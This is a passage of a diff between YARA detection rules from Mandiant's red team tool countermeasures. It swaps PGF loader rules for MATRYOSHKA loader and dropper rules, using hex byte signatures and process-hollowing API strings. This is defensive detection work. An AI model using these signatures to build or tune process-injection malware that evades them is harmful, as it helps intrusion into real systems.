+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Loader_Win64_MATRYOSHKA_2.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "8c91a27bbdbe9fb0877daccd28bd7bb5"
-		logic_hash = "dfff615a1d329cf181294f7b0a32c11a21d66ff8a6aa6b9fcd183c9738369623"
+		hash = "7f8102b789303b7861a03290c79feba0"
+		logic_hash = "daa6f6d526bf959c268b2c5a4cae33307cfec5e9ca51283131bbfa66a582b505"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$cond1 = { 8B FF 55 8B EC 81 EC 30 01 00 00 A1 00 30 00 10 33 C5 89 45 E0 56 C7 45 F8 00 00 00 00 C6 85 D8 FE FF FF 00 68 03 01 00 00 6A 00 8D 85 D9 FE FF FF 50 E8 F9 07 00 00 83 C4 0C C7 45 F4 00 00 00 00 C6 45 E7 00 C7 45 E8 00 00 00 00 C7 45 EC 00 00 00 00 C7 45 FC 00 00 00 00 C7 45 F0 00 00 00 00 6A 01 6A 00 8D 8D D8 FE FF FF 51 6A 00 68 9C 10 00 10 8B 15 10 30 00 10 52 E8 31 01 00 00 89 45 F8 6A 14 FF 15 5C 10 00 10 83 C4 04 89 45 E8 8B 45 F8 8A 48 04 88 4D E7 8B 55 F8 83 C2 0C 8B 45 E8 8B 0A 89 08 8B 4A 04 89 48 04 8B 4A 08 89 48 08 8B 4A 0C 89 48 0C 8B 52 10 89 50 10 C7 85 D4 FE FF FF 00 00 00 00 EB 0F 8B 85 D4 FE FF FF 83 C0 01 89 85 D4 FE FF FF 83 BD D4 FE FF FF 14 7D 1F 8B 4D E8 03 8D D4 FE FF FF 0F B6 11 0F B6 45 E7 33 D0 8B 4D E8 03 8D D4 FE FF FF 88 11 EB C9 8B 55 F8 8B 42 08 89 45 FC 6A 40 68 00 30 00 00 8B 4D FC 51 6A 00 FF 15 00 10 00 10 89 45 EC 8B 55 FC 52 8B 45 F8 83 C0 20 50 8B 4D EC 51 E8 F0 06 00 00 83 C4 0C C7 85 D0 FE FF FF 00 00 00 00 EB 0F 8B 95 D0 FE FF FF 83 C2 01 89 95 D0 FE FF FF 8B 85 D0 FE FF FF 3B 45 FC 73 30 8B 4D EC 03 8D D0 FE FF FF 0F B6 09 8B 85 D0 FE FF FF 99 BE 14 00 00 00 F7 FE 8B 45 E8 0F B6 14 10 33 CA 8B 45 EC 03 85 D0 FE FF FF 88 08 EB B6 8B 4D EC 89 4D F0 FF 55 F0 5E 8B 4D E0 33 CD E8 6D 06 00 00 8B E5 5D C3 }
-		$cond2 = { 8B FF 55 8B EC 81 EC 30 01 00 00 A1 00 30 00 10 33 C5 89 45 E0 56 C7 45 F8 00 00 00 00 C6 85 D8 FE FF FF 00 68 03 01 00 00 6A 00 8D 85 D9 FE FF FF 50 E8 F9 07 00 00 83 C4 0C C7 45 F4 00 00 00 00 C6 45 E7 00 C7 45 E8 00 00 00 00 C7 45 EC 00 00 00 00 C7 45 FC 00 00 00 00 C7 45 F0 00 00 00 00 6A 01 6A 00 8D 8D D8 FE FF FF 51 6A 00 68 9C 10 00 10 8B 15 20 33 00 10 52 E8 31 01 00 00 89 45 F8 6A 14 FF 15 58 10 00 10 83 C4 04 89 45 E8 8B 45 F8 8A 48 04 88 4D E7 8B 55 F8 83 C2 0C 8B 45 E8 8B 0A 89 08 8B 4A 04 89 48 04 8B 4A 08 89 48 08 8B 4A 0C 89 48 0C 8B 52 10 89 50 10 C7 85 D4 FE FF FF 00 00 00 00 EB 0F 8B 85 D4 FE FF FF 83 C0 01 89 85 D4 FE FF FF 83 BD D4 FE FF FF 14 7D 1F 8B 4D E8 03 8D D4 FE FF FF 0F B6 11 0F B6 45 E7 33 D0 8B 4D E8 03 8D D4 FE FF FF 88 11 EB C9 8B 55 F8 8B 42 08 89 45 FC 6A 40 68 00 30 00 00 8B 4D FC 51 6A 00 FF 15 2C 10 00 10 89 45 EC 8B 55 FC 52 8B 45 F8 83 C0 20 50 8B 4D EC 51 E8 F0 06 00 00 83 C4 0C C7 85 D0 FE FF FF 00 00 00 00 EB 0F 8B 95 D0 FE FF FF 83 C2 01 89 95 D0 FE FF FF 8B 85 D0 FE FF FF 3B 45 FC 73 30 8B 4D EC 03 8D D0 FE FF FF 0F B6 09 8B 85 D0 FE FF FF 99 BE 14 00 00 00 F7 FE 8B 45 E8 0F B6 14 10 33 CA 8B 45 EC 03 85 D0 FE FF FF 88 08 EB B6 8B 4D EC 89 4D F0 FF 55 F0 5E 8B 4D E0 33 CD E8 6D 06 00 00 8B E5 5D C3 }
-		$cond3 = { 8B FF 55 8B EC 81 EC 30 01 00 00 A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 C7 45 ?? 00 00 00 00 C6 85 ?? ?? ?? ?? 00 68 03 01 00 00 6A 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 0C C7 45 ?? 00 00 00 00 C6 45 ?? 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 6A 01 6A 00 8D 8D ?? ?? ?? ?? 51 6A 00 68 9C 10 00 10 8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 6A 14 FF 15 ?? ?? ?? ?? 83 C4 04 89 45 ?? 8B 45 ?? 8A 48 ?? 88 4D ?? 8B 55 ?? 83 C2 0C 8B 45 ?? 8B 0A 89 08 8B 4A ?? 89 48 ?? 8B 4A ?? 89 48 ?? 8B 4A ?? 89 48 ?? 8B 52 ?? 89 50 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 8B 85 ?? ?? ?? ?? 83 C0 01 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 14 7D ?? 8B 4D ?? 03 8D ?? ?? ?? ?? 0F B6 11 0F B6 45 ?? 33 D0 8B 4D ?? 03 8D ?? ?? ?? ?? 88 11 EB ?? 8B 55 ?? 8B 42 ?? 89 45 ?? 6A 40 68 00 30 00 00 8B 4D ?? 51 6A 00 FF 15 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 52 8B 45 ?? 83 C0 20 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 0C C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 8B 95 ?? ?? ?? ?? 83 C2 01 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 73 ?? 8B 4D ?? 03 8D ?? ?? ?? ?? 0F B6 09 8B 85 ?? ?? ?? ?? 99 BE 14 00 00 00 F7 FE 8B 45 ?? 0F B6 14 10 33 CA 8B 45 ?? 03 85 ?? ?? ?? ?? 88 08 EB ?? 8B 4D ?? 89 4D ?? FF 55 ?? 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 }
-		$cond4 = { 8B FF 55 8B EC 81 EC 3? ?1 ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 E0 56 C7 45 F8 ?? ?? ?? ?? C6 85 D8 FE FF FF ?? 68 ?? ?? ?? ?? 6A ?? 8D 85 D9 FE FF FF 50 E8 ?? ?? ?? ?? 83 C4 0C C7 45 F4 ?? ?? ?? ?? C6 45 E7 ?? C7 45 E8 ?? ?? ?? ?? C7 45 EC ?? ?? ?? ?? C7 45 FC ?? ?? ?? ?? C7 45 F? ?? ?? ?? ?0 6A ?? 6A ?? 8D 8D D8 FE FF FF 51 6A ?? 68 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 89 45 F8 6A ?? FF ?? ?? ?? ?? ?? 83 C4 04 89 45 E8 8B 45 F8 8A 48 04 88 4D E7 8B 55 F8 83 ?? ?? 8B 45 E8 8B 0A 89 08 8B 4A 04 89 48 04 8B 4A 08 89 48 08 8B 4A 0C 89 48 0C 8B 52 10 89 50 10 C7 85 D4 FE FF FF ?? ?? ?? ?? EB ?? 8B 85 D4 FE FF FF 83 C? ?1 89 85 D4 FE FF FF 83 BD D4 FE FF FF 14 7D ?? 8B 4D E8 03 8D D4 FE FF FF 0F B6 11 0F B6 45 E7 33 D0 8B 4D E8 03 8D D4 FE FF FF 88 11 EB ?? 8B 55 F8 8B 42 08 89 45 FC 6A ?? 68 ?? ?? ?? ?? 8B 4D FC 51 6A ?? FF ?? ?? ?? ?? ?? 89 45 EC 8B 55 FC 52 8B 45 F8 83 ?? ?? 50 8B 4D EC 51 E8 ?? ?? ?? ?? 83 C4 0C C7 85 D0 FE FF FF ?? ?? ?? ?? EB ?? 8B 95 D0 FE FF FF 83 C2 01 89 95 D0 FE FF FF 8B 85 D0 FE FF FF 3B 45 FC 73 ?? 8B 4D EC 03 8D D0 FE FF FF 0F B6 09 8B 85 D0 FE FF FF 99 BE ?? ?? ?? ?? F7 FE 8B 45 E8 0F B6 14 10 33 CA 8B 45 EC 03 85 D0 FE FF FF 88 08 EB ?? 8B 4D EC 89 4D F0 FF ?? ?? 5E 8B 4D E0 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 }
+		$sb1 = { 4D [2] 00 49 [2] 08 B? 02 00 00 00 31 ?? E8 [4] 48 89 ?? 48 89 ?? 4C 89 ?? 49 89 ?? E8 [4] 4C 89 ?? 48 89 ?? E8 [4] 83 [2] 01 0F 84 [4] 48 89 ?? 48 8B [2] 48 8B [2] 48 89 [5] 48 89 [5] 48 89 [5] 41 B? [4] 4C 89 ?? 31 ?? E8 [4] C7 45 [5] 48 89 ?? 4C 89 ?? E8 [4] 85 C0 }
+		$sb2 = { 4C [2] 0F 83 [4] 41 0F [3] 01 41 32 [2] 00 48 8B [5] 48 3B [5] 75 ?? 41 B? 01 00 00 00 4C 89 ?? E8 [4] E9 }
+		$si1 = "CreateToolhelp32Snapshot" fullword
+		$si2 = "Process32Next" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win32_PGF_2 : FILE
+rule FIREEYE_RT_APT_Loader_Win64_MATRYOSHKA_1 : FILE
 {
 	meta:
-		description = "base dlls: /lib/payload/techniques/dllmain/"
+		description = "matryoshka_process_hollow.rs"
 		author = "FireEye"
-		id = "e11a626b-ce91-5f6c-a514-9a8a02a29cbd"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "69919a80-8ed1-5b8c-911a-ceb75570f11f"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_2.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Loader_Win64_MATRYOSHKA_1.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "04eb45f8546e052fe348fda2425b058c"
-		logic_hash = "d69f3f31c4964fe933295563e08bdbb36abadd6611541b9ffa55b6829ced1d21"
+		hash = "44887551a47ae272d7873a354d24042d"
+		logic_hash = "46e5480dc95ce8b9d8385c2e44a50b21629301535b93833c13cc3db319ac15dd"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$sb1 = { 6A ?? FF 15 [4-16] 8A ?? 04 [0-16] 8B ?? 1C [0-64] 0F 10 ?? 66 0F EF C8 0F 11 [0-32] 30 [2] 8D [2] 4? 83 [2] 7? }
-		$sb2 = { 8B ?? 08 [0-16] 6A 40 68 00 30 00 00 5? 6A 00 [0-32] FF 15 [4-32] 5? [0-16] E8 [4-64] C1 ?? 04 [0-32] 8A [2] 3? [2] 4? 3? ?? 24 ?? 7? }
-		$sb3 = { 8B ?? 3C [0-16] 03 [1-64] 0F B? ?? 14 [0-32] 83 ?? 18 [0-32] 66 3? ?? 06 [4-32] 68 [4] 5? FF 15 [4-16] 85 C0 [2-32] 83 ?? 28 0F B? ?? 06 }
+		$sb1 = { 48 8B 45 ?? 48 89 85 [0-64] C7 45 ?? 00 00 00 00 31 ?? E8 [4-64] BA 00 10 00 00 [0-32] 41 B8 04 00 00 00 E8 [4] 83 F8 01 [2-32] BA [4] E8 }
+		$sb2 = { E8 [4] 83 F8 01 [2-64] 41 B9 00 10 00 00 [0-32] E8 [4] 83 F8 01 [2-32] 3D 4D 5A 00 00 [0-32] 48 63 ?? 3C [0-32] 50 45 00 00 [4-64] 0F B7 [2] 18 81 ?? 0B 01 00 00 [2-32] 81 ?? 0B 02 00 00 [2-32] 8B [2] 28 }
+		$sb3 = { 66 C7 45 ?? 48 B8 48 C7 45 ?? 00 00 00 00 66 C7 45 ?? FF E0 [0-64] 41 B9 40 00 00 00 [0-32] E8 [4] 83 F8 01 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win64_PGF_5 : FILE
+rule FIREEYE_RT_APT_Loader_Win_MATRYOSHKA_1 : FILE
 {
 	meta:
-		description = "PGF payload, generated rule based on symfunc/8167a6d94baca72bac554299d7c7f83c"
+		description = "matryoshka_process_hollow.rs"
 		author = "FireEye"
-		id = "4fa4a1d6-cb63-582d-801c-b4c89c44d9ca"
-		date = "2020-12-09"
+		id = "c07fb67e-ded5-593d-b5dc-d0e2c3b5a352"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_5.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Loader_Win_MATRYOSHKA_1.yar#L4-L24"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "150224a0ccabce79f963795bf29ec75b"
-		logic_hash = "16495ad1e5ce4d4a79f4067f3d687911a1a0a3bfe4c6409ff9de4d111b1ddca6"
+		hash = "44887551a47ae272d7873a354d24042d"
+		logic_hash = "8f762684ffd3984630bf41ededa78b8993b53b22591a59912cabfe635775de53"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$cond1 = { 4C 89 44 24 18 89 54 24 10 48 89 4C 24 08 48 83 EC 38 48 8B 4C 24 40 FF 15 13 FA FF FF 8B 44 24 48 89 44 24 20 83 7C 24 20 01 74 02 EB 17 48 8B 44 24 40 48 89 05 66 23 00 00 48 8B 4C 24 40 FF 15 EB F9 FF FF B8 01 00 00 00 48 83 C4 38 C3 }
-		$cond2 = { 4C 89 44 24 18 89 54 24 10 48 89 4C 24 08 48 83 EC 38 48 8B 4C 24 40 FF 15 A3 FA FF FF 8B 44 24 48 89 44 24 20 83 7C 24 20 01 74 02 EB 17 48 8B 44 24 40 48 89 05 F6 20 00 00 48 8B 4C 24 40 FF 15 7B FA FF FF B8 01 00 00 00 48 83 C4 38 C3 }
-		$cond3 = { 4C 89 44 24 18 89 54 24 10 48 89 4C 24 08 48 83 EC 38 48 8B 4C 24 40 FF ?? ?? ?? ?? ?? 8B 44 24 48 89 44 24 20 83 7C 24 2? ?1 74 ?? EB ?? 48 8B 44 24 40 48 ?? ?? ?? ?? ?? ?? 48 8B 4C 24 40 FF ?? ?? ?? ?? ?? B8 01 ?? ?? ?? 48 83 C4 38 C3 }
-		$cond4 = { 4C 89 44 24 ?? 89 54 24 ?? 48 89 4C 24 ?? 48 83 EC 38 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 83 7C 24 ?? 01 74 ?? EB ?? 48 8B 44 24 ?? 48 89 05 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? B8 01 00 00 00 48 83 C4 38 C3 }
+		$s1 = "ZwQueryInformationProcess" fullword
+		$s2 = "WriteProcessMemory" fullword
+		$s3 = "CreateProcessW" fullword
+		$s4 = "WriteProcessMemory" fullword
+		$s5 = "\x00Invalid NT Signature!\x00"
+		$s6 = "\x00Error while creating and mapping section. NTStatus: "
+		$s7 = "\x00Error no process information - NTSTATUS:"
+		$s8 = "\x00Error while erasing pe header. NTStatus: "
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win64_PGF_3 : FILE
+rule FIREEYE_RT_APT_Dropper_Win64_MATRYOSHKA_1 : FILE
 {
 	meta:
-		description = "PGF payload, generated rule based on symfunc/8a2f2236fdfaa3583ab89076025c6269. Identifies dllmain_hook x64 payloads."
+		description = "matryoshka_dropper.rs"
 		author = "FireEye"
-		id = "340ea6d4-7111-520c-9bd4-0465a43ea235"
-		date = "2020-12-09"
+		id = "1406aafd-6217-51ef-b3af-107ee88f9c99"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_3.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Dropper_Win64_MATRYOSHKA_1.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "3bb34ebd93b8ab5799f4843e8cc829fa"
-		logic_hash = "fd82bdec54a76eed12cc8820ef39899f31ea6df21d905530a0d53770b3d9901b"
+		hash = "edcd58ba5b1b87705e95089002312281"
+		logic_hash = "23f811f8e9387ca6a1257a31af66de9739733e4728adba0a3e3f74b5e5c0a556"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 4
+		rev = 1
 
 	strings:
-		$cond1 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 80 8B 06 00 FF D0 48 89 C1 48 8D 85 98 FD FF FF 41 B8 04 01 00 00 48 89 C2 E8 5A B4 00 00 85 C0 0F 94 C0 84 C0 0F 85 16 03 00 00 48 8D 45 AF 48 89 C1 E8 E9 FE 00 00 48 8D 4D AF 48 8D 95 98 FD FF FF 48 8D 85 78 FD FF FF 49 89 C8 48 89 C1 E8 AC 96 01 00 48 8D 45 AF 48 89 C1 E8 F0 FE 00 00 48 8B 05 25 8B 06 00 FF D0 89 C2 B9 08 00 00 00 E8 6B B4 00 00 48 89 45 D0 48 83 7D D0 00 75 0A BB 00 00 00 00 E9 6C 02 00 00 48 C7 45 F0 00 00 00 00 C7 45 EC 00 00 00 00 C7 85 38 F9 FF FF 38 04 00 00 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 AA B3 00 00 89 45 E8 83 7D E8 00 74 57 48 8D 85 38 F9 FF FF 48 8D 50 30 48 8D 85 78 FD FF FF 41 B8 00 00 00 00 48 89 C1 E8 61 F3 00 00 48 83 F8 FF 0F 95 C0 84 C0 74 14 48 8B 85 50 F9 FF FF 48 89 45 F0 8B 85 58 F9 FF FF 89 45 EC 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 4F B3 00 00 89 45 E8 EB A3 48 8B 45 D0 48 89 C1 48 8B 05 20 8A 06 00 FF D0 48 83 7D F0 00 74 06 83 7D EC 00 75 0A BB 00 00 00 00 E9 B9 01 00 00 48 8D 0D 0E C8 05 00 48 8B 05 69 8A 06 00 FF D0 48 8D 15 0A C8 05 00 48 89 C1 48 8B 05 5E 8A 06 00 FF D0 48 89 45 C8 48 89 E8 48 89 45 E0 48 8D 95 28 F9 FF FF 48 8D 85 30 F9 FF FF 48 89 C1 48 8B 05 19 8A 06 00 FF D0 C7 45 DC 00 00 00 00 48 8B 55 E0 48 8B 85 28 F9 FF FF 48 39 C2 0F 83 0D 01 00 00 48 8B 45 E0 48 8B 00 48 3D FF 0F 00 00 0F 86 EC 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 C8 73 1E 48 8B 45 E0 48 8B 00 48 8B 55 C8 48 81 C2 00 10 00 00 48 39 D0 73 07 C7 45 DC 01 00 00 00 83 7D DC 00 0F 84 BB 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 F0 0F 83 AA 00 00 00 48 8B 45 E0 48 8B 00 8B 4D EC 48 8B 55 F0 48 01 CA 48 39 D0 0F 83 90 00 00 00 48 C7 85 F8 F8 FF FF 00 00 00 00 48 C7 85 00 F9 FF FF 00 00 00 00 48 C7 85 08 F9 FF FF 00 00 00 00 48 C7 85 10 F9 FF FF 00 00 00 00 48 C7 85 18 F9 FF FF 00 00 00 00 48 C7 85 20 F9 FF FF 00 00 00 00 48 8B 45 E0 48 8B 00 48 8D 95 F8 F8 FF FF 41 B8 30 00 00 00 48 89 C1 48 8B 05 01 8A 06 00 FF D0 8B 85 1C F9 FF FF 83 E0 20 85 C0 74 20 48 8B 45 E0 48 8B 00 48 8D 15 E0 F9 FF FF 48 89 C1 E8 D5 FC FF FF BB 00 00 00 00 EB 57 90 EB 01 90 48 83 45 E0 08 E9 DF FE FF FF 48 8B 45 F0 48 89 45 C0 48 8B 45 C0 8B 40 3C 48 63 D0 48 8B 45 F0 48 01 D0 48 89 45 B8 48 8B 45 B8 8B 40 28 89 C2 48 8B 45 F0 48 01 D0 48 89 45 B0 48 8B 45 B0 48 8D 15 87 F9 FF FF 48 89 C1 E8 7C FC FF FF BB 01 00 00 00 48 8D 85 78 FD FF FF 48 89 C1 E8 CB 9C 01 00 83 FB 01 EB 38 48 89 C3 48 8D 45 AF 48 89 C1 E8 37 FC 00 00 48 89 D8 48 89 C1 E8 4C AA 00 00 48 89 C3 48 8D 85 78 FD FF FF 48 89 C1 E8 9A 9C 01 00 48 89 D8 48 89 C1 E8 2F AA 00 00 90 48 81 C4 28 07 00 00 5B 5D C3 }
-		$cond2 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 ?? ?? ?? ?? FF D0 48 89 C1 48 8D 85 ?? ?? ?? ?? 41 B8 04 01 00 00 48 89 C2 E8 ?? ?? ?? ?? 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 4D ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 89 C2 B9 08 00 00 00 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? 00 75 ?? BB 00 00 00 00 E9 ?? ?? ?? ?? 48 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 38 04 00 00 48 8D 95 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 74 ?? 48 8D 85 ?? ?? ?? ?? 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 41 B8 00 00 00 00 48 89 C1 E8 ?? ?? ?? ?? 48 83 F8 FF 0F 95 C0 84 C0 74 ?? 48 8B 85 ?? ?? ?? ?? 48 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 48 8D 95 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 89 45 ?? EB ?? 48 8B 45 ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? BB 00 00 00 00 E9 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 89 45 ?? 48 89 E8 48 89 45 ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 C7 45 ?? 00 00 00 00 48 8B 55 ?? 48 8B 85 ?? ?? ?? ?? 48 39 C2 0F 83 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 48 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 48 39 45 ?? 73 ?? 48 8B 45 ?? 48 8B 00 48 8B 55 ?? 48 81 C2 00 10 00 00 48 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 48 39 45 ?? 0F 83 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 8B 4D ?? 48 8B 55 ?? 48 01 CA 48 39 D0 0F 83 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 8B 45 ?? 48 8B 00 48 8D 95 ?? ?? ?? ?? 41 B8 30 00 00 00 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 48 8B 45 ?? 48 8B 00 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BB 00 00 00 00 EB ?? 90 EB ?? 90 48 83 45 ?? 08 E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 45 ?? 48 8B 45 ?? 8B 40 ?? 48 63 D0 48 8B 45 ?? 48 01 D0 48 89 45 ?? 48 8B 45 ?? 8B 40 ?? 89 C2 48 8B 45 ?? 48 01 D0 48 89 45 ?? 48 8B 45 ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BB 01 00 00 00 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB 01 EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 81 C4 28 07 00 00 5B 5D C3 }
-		$cond3 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 C1 7C 06 00 FF D0 48 89 C1 48 8D 85 98 FD FF FF 41 B8 04 01 00 00 48 89 C2 E8 33 B4 00 00 85 C0 0F 94 C0 84 C0 0F 85 16 03 00 00 48 8D 45 AF 48 89 C1 E8 B2 FE 00 00 48 8D 4D AF 48 8D 95 98 FD FF FF 48 8D 85 78 FD FF FF 49 89 C8 48 89 C1 E8 75 96 01 00 48 8D 45 AF 48 89 C1 E8 B9 FE 00 00 48 8B 05 66 7C 06 00 FF D0 89 C2 B9 08 00 00 00 E8 3C B4 00 00 48 89 45 D0 48 83 7D D0 00 75 0A BB 00 00 00 00 E9 6C 02 00 00 48 C7 45 F0 00 00 00 00 C7 45 EC 00 00 00 00 C7 85 38 F9 FF FF 38 04 00 00 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 83 B3 00 00 89 45 E8 83 7D E8 00 74 57 48 8D 85 38 F9 FF FF 48 8D 50 30 48 8D 85 78 FD FF FF 41 B8 00 00 00 00 48 89 C1 E8 2A F3 00 00 48 83 F8 FF 0F 95 C0 84 C0 74 14 48 8B 85 50 F9 FF FF 48 89 45 F0 8B 85 58 F9 FF FF 89 45 EC 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 28 B3 00 00 89 45 E8 EB A3 48 8B 45 D0 48 89 C1 48 8B 05 69 7B 06 00 FF D0 48 83 7D F0 00 74 06 83 7D EC 00 75 0A BB 00 00 00 00 E9 B9 01 00 00 48 